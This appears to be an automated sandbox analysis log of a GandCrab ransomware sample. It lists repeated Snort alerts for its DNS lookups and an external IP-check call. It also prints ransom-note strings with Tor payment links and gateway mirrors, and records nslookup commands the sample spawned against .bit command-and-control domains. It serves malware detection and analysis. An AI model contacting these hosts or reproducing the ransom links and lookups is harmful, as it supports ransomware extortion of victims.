                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53274 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59829 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59830 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59831 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59832 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62433 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62434 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62435 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62436 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64273 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64274 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64275 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64276 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51107 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51108 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51109 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:51110 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52457 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52458 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52459 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52460 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55246 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55247 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55248 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55249 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64973 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64974 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53039 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53040 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53041 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53042 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55459 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55460 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55461 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55462 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60818 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60819 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60820 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60821 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62426 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62427 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62428 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:62429 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61128 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61129 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61130 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61131 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58914 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58915 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58916 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58917 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50624 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50625 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50626 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50627 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55651 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55652 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55653 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55654 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64378 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64379 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64380 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64381 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52112 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52113 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52114 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52115 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63689 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63690 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63691 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63692 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57826 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57827 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57828 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57829 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52743 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52744 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52745 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:52746 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60646 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60647 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60648 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60649 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55953 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55954 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55955 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:55956 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51594 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51595 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51596 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51597 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61361 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61362 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61363 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61364 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58482 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58483 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58484 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:58485 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51891 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51892 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51893 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51894 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60420 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60421 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60422 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60423 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54285 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54286 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54287 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:54288 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59765 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59766 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59767 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59768 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54433 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54434 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54435 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54436 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65463 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65464 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65465 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65466 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50092 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50093 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50094 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50095 -> 8.8.8.8:53
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com1_2_004068F0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com1_2_004068F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com13_2_004068F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com13_2_004068F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com21_2_004068F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_004068F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com21_2_004068F0
                    Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: vkspii.exe, 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: vkspii.exe, 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: 9gkAKTWOXp.exeString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: 9gkAKTWOXp.exeString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: 9gkAKTWOXp.exeString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: 9gkAKTWOXp.exeString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: 9gkAKTWOXp.exeString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: 9gkAKTWOXp.exeString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: vkspii.exe.1.drString found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: vkspii.exe.1.drString found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: vkspii.exe.1.drString found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: vkspii.exe.1.drString found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: vkspii.exe.1.drString found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: vkspii.exe.1.drString found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
